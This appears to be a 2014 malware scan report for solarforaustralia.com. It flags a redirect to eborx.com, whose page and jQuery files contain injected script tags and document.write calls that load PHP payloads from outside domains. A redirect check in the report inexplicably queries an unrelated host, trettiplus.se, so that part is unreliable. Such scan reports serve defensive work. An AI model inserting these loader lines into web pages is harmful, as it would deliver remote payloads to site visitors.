Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=solarforaustralia.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: trettiplus.se
Result:
HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Fri, 03 Oct 2014 18:11:25 GMT
Via: 1.1 varnish
Accept-Ranges: bytes
Age: 0
Server: Apache
Content-Length: 65
Content-Type: text/html
X-Onecom-Suspended: true
X-Varnish: 1830470545 1830470386
...65 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: trettiplus.se
Referer: http://www.google.com/search?q=trettiplus.se
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://solarforaustralia.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 03 Jul 2014 14:16:13 GMT Location: http://www.eborx.com/ Server: Apache Vary: Accept-Encoding Content-Length: 229 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: startBAK=R3415742665; path=/; expires=Thu, 03-Jul-2014 15:20:44 GMT Set-Cookie: start=R1548263536; path=/; expires=Thu, 03-Jul-2014 15:32:54 GMT | malicious |
http://www.eborx.com/ | 200 OK Content-Length: 16615 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.sabrinaneublum.com.br ...[5016 bytes skipped]... ="#">DE</a> <a href="#" class="active">PL</a> <a href="#">CZ</a> <a href="#">SK</a> </div> <div class="menu"> <div class="menu_top_item" style="margin-left:55px;"> <a href="index.php?p=1">Firma<script type="text/javascript" src="http://www.sabrinaneublum.com.br/cgi-local/qbw2rktb.php?id=124878036"></script></a> <div class="sub"> <ul><li><a href = "index.php?p=1&s=1">Specjalizacja</a></li><li><a href = "index.php?p=1&s=2">Polityka Jakości</a></li><li><a href = "index.php?p=1&s=3">Certyfikaty</a></li><li><a href = "index.php?p=1&s=4">Managm ...[15197 bytes skipped]... | ||
http://www.eborx.com/scripts/jquery-1.4.2.min.js | 200 OK Content-Length: 72322 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://zuberskynahon.cz/images/n6ftkxyw.php?id=124878052"></script>'); | ||
http://solarforaustralia.com/scripts/jquery.nivo.slider.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 03 Jul 2014 14:16:14 GMT Location: http://www.eborx.com/scripts/jquery.nivo.slider.js Server: Apache Vary: Accept-Encoding Content-Length: 258 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: startBAK=R3415747021; path=/; expires=Thu, 03-Jul-2014 15:20:32 GMT Set-Cookie: start=R1548263536; path=/; expires=Thu, 03-Jul-2014 15:18:07 GMT | malicious |
http://www.eborx.com/scripts/jquery.nivo.slider.js | 200 OK Content-Length: 15263 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://zuberskynahon.cz/images/n6ftkxyw.php?id=124878054"></script>'); | ||
http://www.sabrinaneublum.com.br/cgi-local/qbw2rktb.php?id=124878036 | 404 Not Found Content-Length: 1048 Content-Type: text/html | clean |
http://www.sabrinaneublum.com.br/ | 200 OK Content-Length: 4239 Content-Type: text/html | clean |
http://www.sabrinaneublum.com.br/AC_RunActiveContent.js | 200 OK Content-Length: 8028 Content-Type: application/x-javascript | clean |
http://www.sabrinaneublum.com.br/test404page.js | 404 Not Found Content-Length: 1048 Content-Type: text/html | clean |